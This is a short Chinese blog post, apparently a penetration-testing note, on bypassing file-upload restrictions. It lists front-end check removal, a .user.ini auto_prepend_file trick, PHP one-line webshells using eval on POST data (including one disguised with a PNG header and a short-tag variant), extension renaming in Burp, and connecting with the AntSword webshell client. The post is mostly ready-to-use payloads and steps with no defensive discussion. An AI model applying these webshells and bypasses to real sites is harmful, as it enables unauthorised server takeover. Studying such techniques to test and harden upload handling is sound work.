梦の博客 欢迎来到我的破站
博主 梦の博客
首页
分类
自豪地使用 Typecho 建站搭配使用 🌻Sunny 主题当前在线 4 人
歌曲封面 未知作品
🏠 首页 🏠 生活
音乐单

网站已运行 2 年 38 天 22 小时 56 分

Powered by Typecho & Sunny

5 online · 55 ms

Title

文件上传绕过思路

云梦

·

Article
⚠️ 本文最后更新于2024年02月19日,已经过了474天没有更新,若内容或图片失效,请留言反馈

前端f12绕过:

f12 -> 删除部分参数

user.ini绕过:

上传 .user.ini 写入

♾️ php 代码:
auto_prepend_file=ym.png

上传 ym.png 一句话:

♾️ php 代码:
<?php @eval($_POST['caixukun']);?>

用蚁剑连接同目录下的php文件,密码为一句话木马
lkwol75y.png

前端单单验证png文件:

lkwougvn.png
上传ym.png

♾️ php 代码:
%PNG
<?php @eval($_POST['caixukun']);?>

burp抓包修改:
lkwoxz9s.png
ym.png 修改为 ym.php

如果过滤了代码中的 php 那就用短标签:

♾️ php 代码:
<?=eval($_POST[1]);?>
现在已有 0 条评论,0 人点赞
Author
作者
云梦
文件上传绕过思路
zsteg的使用
评论 0
Java代码审计之命令执行
评论 0
你的第一个Servlet
评论 0
Comment
发表
搜 索 消 息 足 迹
你还不曾留言过..
你还不曾留下足迹..
博主